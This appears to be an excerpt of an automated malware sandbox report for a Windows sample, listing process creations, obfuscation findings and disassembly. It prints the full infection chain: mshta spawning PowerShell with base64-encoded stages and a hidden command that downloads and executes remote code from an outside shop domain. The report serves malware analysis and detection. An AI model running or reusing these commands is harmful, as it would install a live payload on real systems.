                Source: Binary string: C:\Users\Kernel32\Desktop\ki_to_ki\Assaac\obj\x64\Release\Assaac.pdb source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.dr

                Data Obfuscation

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZS
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$byteSTriNG = $Enc.$CVuaLhN1RccnM3ERl0SadUDnZEo1bErVwcWOIMKX3lRIWGCiQGYHB5vyAHRyPaAUtYWpxCJxcEBSm0eyqdVCZt8p3as6IScdMHffaSTD7vBmakZa5f1y4TygvKpzCRdcgCv5icqS2x91xwwR8f0LerOe5uYPYg
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw==')))
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw==')))Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" Jump to behavior
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drStatic PE information: 0xBB299474 [Wed Jul 3 08:06:12 2069 UTC]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC437E push edi; retf 13_2_02BC4381
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02C912E0 push esp; retn 0002h13_2_02C912E9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02C9AA42 push esp; ret 13_2_02C9AA49
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_06BA965B push FFFFFFE8h; iretd 13_2_06BA965D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_06BAA59E push cs; retf 13_2_06BAA59F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_06BF1EB8 push esp; retf 13_2_06BF20F1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_06BF216A push eax; iretd 13_2_06BF2171
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072EB59F pushfd ; iretd 13_2_072EB5AA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08067CE3 push edi; retf 13_2_08067CE4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08070471 push es; ret 13_2_08070480
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0807E7D8 pushfd ; retf 13_2_0807E7E1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044A888 push ss; iretd 19_2_0044A899
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0044AB99 push 00BEF4A1h; iretd 19_2_0044ABA0
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeCode function: 20_2_00007FFAABD1D2A5 pushad ; iretd 20_2_00007FFAABD1D2A6
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeCode function: 20_2_00007FFAABE300AD pushad ; iretd 20_2_00007FFAABE300C1
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeCode function: 20_2_00007FFAABE3270B push ebx; retf 20_2_00007FFAABE3272A
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drStatic PE information: section name: .text entropy: 6.849051997127782
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeJump to dropped file
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
